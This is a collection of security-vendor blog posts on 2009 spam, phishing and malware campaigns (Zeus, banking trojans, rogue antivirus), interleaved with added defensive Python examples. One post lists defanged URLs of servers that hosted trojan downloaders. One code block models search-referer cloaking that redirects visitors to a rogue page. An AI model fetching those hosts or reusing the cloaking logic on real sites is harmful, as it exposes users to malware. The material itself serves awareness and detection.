The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

  • “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
  • This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
  • One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
  • January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

H1N1 Vaccination Profile – A path to infection

On December 1st McAfee Labs detected a spam outbreak pretending to be from the CDC and using the H1N1 virus as a lure to distribute a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

H1N1 Vaccination Profile email claims to be from the CDC.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a URL that points to a website which urges the victim to download a vaccination profile archive:

This website wants to give you a virus.

The link leads to an executable that installs a VERY recent Zeus Trojan variant. Zeus is an easy-to-use kit for building Trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detect this strain (7 of 41 engines detected it according to VirusTotal, and McAfee accounted for 2 of those 7).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicates that most of them were registered with a Belgian registrar, active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar, “Xin Net Technologies”, but the DNS servers themselves are hosted at locations in the US, Japan and Hong Kong. We even see some of the DNS servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to distribute the Zeus Trojan. This could indicate that some of the DNS servers themselves are simply infected hosts.

The hostnames resolve to 135 distinct IP addresses for the websites hosting the Trojan; these are spread all over the world and appear to be DSL subscriber lines.

The primary countries hosting the websites at the time of this writing are Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

Get Rich Quick! Just In Time for the Holidays

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that cyber criminals can take advantage of. Fears of not being able to pay the monthly mortgage, car payments, backed-up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as they try to make ends meet. Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up their sensitive information. In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple of such scams arriving via email which link to Twitter updates or free blogging services like Google’s Blogspot:

Get Rich!

More Getting Rich!!!

Get Rich Tweet!!

As the holiday season progresses, we will see more of these types of scams popping up, with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card! One bit of advice that we ask users to follow: if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing its address into your browser. Do not click on a link in an email or instant message to get there, because the link might actually be masked to go to a lookalike site set up by cyber criminals to steal your personal information. If the offer that arrived in your inbox is legitimate, it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Boosting Security Awareness in Colleges

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, which makes a bad situation worse. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Students’ social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which makes this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

  • Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
  • Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
  • 71 percent of fraud happens within one week of the theft of a victim’s personal data
  • Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

Stats

Students should protect themselves by learning how to detect and resolve identity theft. Here are some general tips to minimize the risk of identity theft:

  • Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
  • Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords or your debit or credit card PINs, and do not leave papers with personal information, or unlocked computers, lying about.
  • Protect your computer. It is a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
  • Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.


Make Your Password Secure

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember it; and the more complex the password is, the less likely we will be able to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation a hacker who compromises a single website gets the username and password for all of your accounts. Remember that a password you give to a website is held by that website, not only by you. Thus giving a website a password that also opens other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by having a computer program try them all. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to break the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

  • The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
  • The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is much better than the single global password, but much better than “worst” is still not good.
  • The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and inflexible (if you go on vacation and forget it), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible to coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeated passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: All we need to remember is the algorithm that generates the password. Thus we need to take something about ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), as well as special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts, it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.
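Two things are worth seeing in code, as an added example that is not part of the original post: the first example above written out exactly (token, “i” to 1, capital last letter, the keys one row up from the site name on a US QWERTY keyboard, then “^!”), and the same idea with the mental transform replaced by a keyed hash. The difference matters for the point made in the last paragraph: an attacker who sees “123l1ghTjdqr33^!” can read the token and the keyboard shift straight off it and reproduce the rule for any other site, whereas HMAC(master, site) gives a per-site password from which neither the master nor any other site’s password can be recovered. The cost is that the hash version has to be computed by a tool rather than in your head, at which point a password manager that stores random per-site passwords is the usual choice. The QWERTY layout and the character classes required are assumptions for the example.

```python
import hashlib
import hmac
import string

# Rows of a US QWERTY keyboard, top to bottom (assumption: the post's "keys above"
# trick is read against this layout)
QWERTY_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]

ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits + "^!+*#%"
CLASSES = (string.ascii_lowercase, string.ascii_uppercase, string.digits, "^!+*#%")


def key_above(ch: str) -> str:
    """The key one row up from ch on a QWERTY keyboard (ch itself if there is none)."""
    for upper, lower in zip(QWERTY_ROWS, QWERTY_ROWS[1:]):
        if ch in lower:
            return upper[lower.index(ch)]
    return ch


def post_algorithm(token: str, site: str) -> str:
    """The post's first example, step by step: '123', the token with i->1 and a
    capital final letter, the keys above the site's name, then '^!'."""
    word = token.replace("i", "1")
    word = word[:-1] + word[-1].upper()
    name = site.split(".")[0]
    return "123" + word + "".join(key_above(c) for c in name) + "^!"


def has_all_classes(pw: str) -> bool:
    return all(any(c in cls for c in pw) for cls in CLASSES)


def derived_password(master: str, site: str, counter: int = 0, length: int = 16) -> str:
    """Keyed-hash version of the same idea: HMAC-SHA256(master, site|counter), mapped
    onto the alphabet. counter is the per-site "token" you write down when a site
    forces a rotation; the master secret stays in your head and is never stored."""
    for tweak in range(256):                      # retry until every class is present
        msg = f"{site}\x00{counter}\x00{tweak}".encode()
        n = int.from_bytes(hmac.new(master.encode(), msg, hashlib.sha256).digest(), "big")
        chars = []
        for _ in range(length):                   # 16 chars of a 68-symbol alphabet ~ 97 bits
            n, idx = divmod(n, len(ALPHABET))
            chars.append(ALPHABET[idx])
        pw = "".join(chars)
        if has_all_classes(pw):
            return pw
    raise RuntimeError("could not satisfy the character-class policy")


if __name__ == "__main__":
    print(post_algorithm("light", "mcafee.com"))
    print(derived_password("correct horse battery", "mcafee.com"))
    print(derived_password("correct horse battery", "mcafee.com", counter=1))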

Fly for $1 or Your Money Back!

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistible idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several hundred dollars less in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

Spam_Scam

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that fetches password-stealing malware targeting the customers of Brazilian banks. The malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets. :)

Rogue Anti-Spyware Targets Sesame Street’s Big Bird

The idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Big Bird’s birthday.

Big Bird

Google changes its logo on special occasions, and this time it features Big Bird. The topic shows up clearly in Today’s Hot Trends, and that is exactly what malware writers watch.

This year is the fortieth anniversary of Sesame Street, and the bad guys have begun their attack. Searching Google for keywords such as Big Bird’s birthday and Big Bird returns results that point to compromised sites.

Watch the video below, which shows how rogue anti-spyware attacks a system.

The video shows that the malware is pushed onto the system regardless of what the user does. In the past we have seen malware injected into a compromised site through exploits and iframes. Today the redirect to the payload is often triggered only when the visitor arrives from a search-results page. In certain attacks, if a user accesses a compromised site directly, there is no redirection to a payload and no infection.

Users have no idea what they will get by clicking on search results, which now are like a virtual minefield; you never know what will happen next. McAfee strives to protect users from such attacks through its free SiteAdvisor technology. It warns users with green, yellow, and red alerts next to each search result. You can minimize your risk of attack by using SiteAdvisor and paying attention to what you are clicking on.
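The behaviour just described, payload only for visitors who arrive from a search-results page, is a server-side check on the Referer header, and it is why a responder who opens the flagged URL directly sees a clean page. The following is an added example, not code from the original post: a stand-in for the injected cloaking logic, and the probe used to expose it, which fetches the same URL with no Referer and then with search-engine Referers and compares the outcomes. Everything runs in-process; the handler, the rogue landing URL and the search-engine list are constructed for the example, and real kits also key on User-Agent and visitor IP ranges, so a thorough probe varies those too.

```python
import re
from urllib.parse import urlparse

# Hostnames the cloaking script treats as "arrived from a search engine"
# (assumption: the common set; real kits carry longer lists)
SEARCH_ENGINE_HOST = re.compile(r"(^|\.)(google|bing|yahoo)\.", re.IGNORECASE)

# Probe set: the same URL fetched with no Referer, then with search-engine Referers
PROBE_REFERERS = (
    None,
    "http://www.google.com/search?q=big+bird+birthday",
    "http://www.bing.com/search?q=big+bird+birthday",
)


def came_from_search(headers: dict) -> bool:
    """The test the injected script performs on each request."""
    host = urlparse(headers.get("Referer", "")).netloc
    return bool(SEARCH_ENGINE_HOST.search(host))


def compromised_handler(headers: dict) -> tuple:
    """Stand-in for a compromised page (constructed behaviour, not real site code):
    search-engine visitors are bounced to the rogue anti-spyware landing page,
    everybody else, including the site owner and the analyst, sees the article."""
    if came_from_search(headers):
        return 302, {"Location": "http://rogue.invalid/scan.php"}, b""
    return 200, {}, b"<html><body>Big Bird turns 40!</body></html>"


def honest_handler(headers: dict) -> tuple:
    """A page that serves the same thing to everyone."""
    return 200, {}, b"<html><body>Big Bird turns 40!</body></html>"


def detect_referer_cloaking(handler) -> dict:
    """Fetch once per probe Referer and compare what comes back. Any divergence in
    status, redirect target or body size between probes means the page is keyed
    on the Referer. handler(headers) stands in for an HTTP GET of one URL."""
    outcomes = {}
    for ref in PROBE_REFERERS:
        headers = {"User-Agent": "Mozilla/5.0"}
        if ref is not None:
            headers["Referer"] = ref
        status, resp_headers, body = handler(headers)
        outcomes[ref] = (status, resp_headers.get("Location"), len(body))
    return {"cloaked": len(set(outcomes.values())) > 1, "outcomes": outcomes}


if __name__ == "__main__":
    for name, handler in (("compromised", compromised_handler), ("honest", honest_handler)):
        print(name, detect_referer_cloaking(handler))
```

From a shell the same probe is two curl calls against the live URL, one plain and one with `-e 'http://www.google.com/search?q=big+bird+birthday'`, comparing the status line and Location header; do it from a disposable machine, since the second request is the one that triggers the redirect chain.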

Tis the Season for Christmas Spam! Fa La La La La…

It didn’t take long for spammers to swap their Halloween lures for Christmas ones. They’ve already moved to the Christmas season, and we have started to see emails from the Cutwail botnet that use a Christmas theme to trick users into visiting malicious websites. Spammers must be trying to beat retailers to the advertising punch this year.

Christmas spam

The campaign we are currently monitoring uses subject lines that try to get users to visit websites selling fake jewelry and Rolexes. These spammers aren’t cheap either. Only the best will do for their customers–brands such as Cartier, Gucci, and Tag Heuer are on “sale” to all who would be fooled.

Rolex ad

They even went so far as to include a Better Business Bureau logo and a “Hacker Safe” image on their site. Ironic, isn’t it?

This and similar sites are part of a campaign to steal your credit card information and identity. With the holiday shopping season rushing toward us, be sure to exercise extreme diligence regarding businesses you give your sensitive information to. The tricks that criminals use during the holiday season will be difficult to discern from legitimate marketing.

How can you stay safe? Avoid clicking links in emails. If you want to visit your favorite retail site to check out their holiday specials, type the address directly into the address bar. Most legitimate sites will not force you to click a link within an email to take advantage of their latest deals.

Facebook Phishing Campaign Pushes ‘Cocktail’ Attack

We have already discussed the Facebook phishing campaign. Now the scammers are using the phishing campaign not just for spamming but also for a “cocktail” attack.

  • The scammers have targeted Facebook users, telling them that their Facebook account passwords have been changed.
  • The malware downloads a keylogger to collect credit card numbers, social security numbers, and other passwords from the victims’ machines.
  • The malware pushes a fake security product, which disables many applications, such as Notepad, Wordpad, etc., until the bad guys are paid.

This phishing campaign attempts to convince users that the email comes from Facebook by forging the From: address.

Phishing mail

The mail claims the password has been changed and that the new one is in the attached zip file. Once the victim unzips it, they see a file with a spreadsheet icon. When they open the file to look for the password, it drops the payload and deletes itself. Once installed, the malware connects to the attacker’s server over the HTTP port and attempts to download more payloads onto the infected machine.

The malware also downloads a keylogger and runs it covertly. This second stage captures every keystroke so that it can collect login IDs and passwords, credit card numbers, social security numbers, and so on, and sends the data to a remote server through a backdoor it creates. But this is not yet the end of the game.

While this data theft is taking place, the malware also tries to download a fake security product. The rogue application, fetched through the backdoor, is installed covertly on the victim’s machine. Once installed, it runs a service that kills almost every open application: Notepad, Calculator, Registry Editor, Task Manager, and others. (It spares Internet Explorer because it needs IE to communicate with the malware server.) After killing these apps, the malware shows a fake alert claiming that the application you tried to open was being used to connect to a malware server. (See image below.)
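The two things a mail gateway can check for in a message like this one are the forged sender and the contents of the zip, rather than its icon. The following is an added example (not McAfee’s code and not the campaign’s); the message, the zip attachment, the sender domains and the member file name are all constructed here for illustration.

```python
"""Triage of a mail like the one described above: a forged From: header and
a zip attachment whose only member is an executable dressed up as a
spreadsheet. Added example, not McAfee's code; the message and the
attachment are constructed, and the domains are placeholders."""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}
DOCUMENT_EXTENSIONS = {".xls", ".doc", ".pdf", ".txt", ".jpg"}


def build_sample_eml() -> bytes:
    """Constructed sample: the display name says Facebook, the envelope sender
    does not, and the zip holds an 'MZ' stub named like an Excel sheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Facebook_Password_4cf91.xls.exe", b"MZ" + b"\x00" * 62)
    msg = EmailMessage()
    msg["From"] = "Facebook <service@facebook.com>"        # forged header
    msg["Return-Path"] = "<bounce@example-mailer.test>"   # envelope sender (placeholder)
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Facebook Password Reset Confirmation"
    msg.set_content("Your password has been changed. The new one is attached.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Facebook_details.zip")
    return msg.as_bytes()


def _domain(header_value) -> str:
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def triage(raw: bytes) -> list:
    """Return human-readable findings; an empty list means these checks saw
    nothing suspicious."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    # 1. From: is trivially forgeable; compare it with the envelope sender
    #    (Return-Path) that the receiving MTA recorded.
    from_domain = _domain(msg["From"])
    envelope_domain = _domain(msg["Return-Path"])
    if envelope_domain and envelope_domain != from_domain:
        findings.append(f"sender domain mismatch: From={from_domain} "
                        f"Return-Path={envelope_domain}")

    # 2. Look inside zip attachments instead of trusting names and icons.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith(".zip"):
            continue
        with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
            for info in zf.infolist():
                member = info.filename
                pieces = member.lower().rsplit(".", 2)
                ext = "." + pieces[-1] if len(pieces) > 1 else ""
                if ext in EXECUTABLE_EXTENSIONS:
                    findings.append(f"{name}: member {member!r} is an executable")
                if (len(pieces) == 3 and "." + pieces[1] in DOCUMENT_EXTENSIONS
                        and ext in EXECUTABLE_EXTENSIONS):
                    findings.append(f"{name}: member {member!r} uses a double "
                                    f"extension to look like a document")
                if zf.read(info)[:2] == b"MZ":          # PE magic, whatever the name
                    findings.append(f"{name}: member {member!r} starts with the "
                                    f"MZ magic of a PE executable")
    return findings


if __name__ == "__main__":
    for finding in triage(build_sample_eml()):
        print("!", finding)
```

The Return-Path comparison stands in for what a production gateway would do, which is evaluate SPF and DKIM for the From: domain; the attachment checks are the ones that matter here, because the spreadsheet icon the victim sees is just an extension and a resource, and the `MZ` magic inside the zip is what the file actually is.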

Fake Alert

Fake Security Product

Phishing campaigns on social networking sites are not new. Scammers are no longer satisfied with pushing spam that sells “Canadian” pills: now they also want to sell fake security products, and they want all of our passwords. With McAfee coverage, you’ll be protected against this cocktail attack.

Trick or Treat With Spam and Malicious Screensavers

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Halloween Viagra

Here’s another:

Holiday Scam Products

And our favorite with a holiday spin:

Canadian Halloween Pharmacy

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Malicious Halloween Screensavers

Keep your security updated and search safely this week!

Let’s Play ‘Find the Errors’

I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending on your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how this malware usually spreads:

  • Spam with the usual “click here to see photos/videos/statement/etc.” links
  • IM (MSN Messenger, Skype, etc.)

This version of PWS-Banker, besides grabbing passwords and screenshots, also downloads Microsoft MSN Messenger, or at least an app that looks like Messenger.

When you enter your username and password and press Enter, the app exits. In the background, however, it messages all your contacts on your behalf, sending them friendly notes with links.

    Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

    fake and real

    Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

    Here are the answers, starting from the top and working downward.

    spot_the_dumbs

1) The windows differ; note the minimize/maximize/close buttons
2) The help icon looks the same, but when you click it, nothing in the menu is clickable
3) The login-name drop-down doesn’t work
4) The status drop-down doesn’t work
5, 6, 7) The three check boxes don’t work

    Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

    McAfee Labs Goes After Evil Maid

In her recent blog post Joanna Rutkowska describes proof-of-concept code that attacks TrueCrypt system disk encryption. The post also notes that “the concept behind the Evil Maid Attack is neither new, nor l33t in any way.” However, now that the PoC is published, we expect script kiddies to jump on the opportunity and tweak the code to their advantage.

As always, to protect our customers we looked into a possible AV detection mechanism to alert users when a system has been compromised. Obviously an AV cannot prevent an Evil Maid attack, since the attacker has physical access to the machine and tampers with it before the operating system ever boots, but alerting the user on the first reboot after such an infection can go a long way toward preventing data loss.

We now detect this proof-of-concept code as Trojan PWS-EvilMaid!demo, due to its password-stealing capabilities, and we will watch for any variants that follow this trend. Here is a screenshot of McAfee alerting the user once the machine is infected. We recommend that you reinstall TrueCrypt if you see this detection.

    EvilMaid Detection

    Protect what you value!

    Balloon Boy Spam Drifts Through Town

    It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spam leads to the same old stuff:

    Subject: Drama With Balloon (Exclusive)

    All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

    Bogus Canadian Pharmacy Site

    Common subjects to beware of include:

    Little boy trapped in balloon
    Boy-balloon-madness
    balloon kid’s full story
    Balloon boy died
    Drama with balloon(exclusive)

    Be careful what you click, and mind the news. It is often the lure the spammers look for.

    My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

    Windows 7 Beaten to the Punch by Spam

    The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

    We’ve seen subjects that include:

    Microsoft Windows 7 special offers
    Windows 7 SP 2
    Windows 7 FAQ on release
    Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
    Windows7 ultimate 86% off
    Windows7 ultimate 57% off

    We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

    As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

    I thank my colleague Adam Wosotowsky for the background data!

    Cybercrime Organizations Turn to ‘Mafia-Style’ Structure

    In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

One of the most interesting talks was given by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian company the Federal Trade Commission has accused of running massive scareware schemes: alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland granted the FTC’s request to halt the company’s activities and freeze the assets of those behind the scams.

Dirk explained that Innovative had more than 600 employees in real offices, subsidiaries in countries such as India, Poland, Canada, the United States, and Argentina, and even customer call centers. The company received approximately 4.5 million order IDs in 11 months, or roughly US$180 million at $40 per order. Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appeared to be a legitimate front. Following its legal troubles the company is now defunct, yet many of its employees have joined a new entity with the same production targets.


The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Its members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated card-cloning devices, they received the cardholder data from Russian accomplices. The gang spent the money withdrawn from ATMs on strip clubs, luxury cars, luxury hotels, food, and fine drinks.

In the second part of his talk, Dmitri presented a timeline of events in the Eastern European carding underground.

He discussed CarderPlanet and its hierarchical structure, set up like a mafia. (Source for the following image: NICSA-FBI-SSA, Michael J. McKeown.)

CarderPlanet was shut down in 2004, and the FTC complaint for the injunction against Innovative Marketing (IMU) dates from December 2008, but cybercrime gangs always rise from their ashes.

    Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

The latest news on carding and phishing demonstrates the size and the worldwide organization of today’s cybercrime gangs.

• In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, forwarded the money they had embezzled to Ukraine and Russia.
• Also in France, a gang of Slovakian criminals based in Britain came under investigation after bank cards were used to withdraw more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans crossed from Dover to Calais early on September 11 before emptying cash points across the region; 34 were arrested, all carrying Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
• This month in the United States, the FBI announced the results of Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens were charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identity theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was highly organized, as shown by a chart Gary Warner created with i2 Analyst’s Notebook.

    All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

    ASCII Art Spam Strikes Back

Spammers are always looking for techniques that can beat spam filters. We have seen many of them: obfuscating words, embedding text in images, spoofing URLs, abusing social networking sites, and other tricks to avoid getting caught.

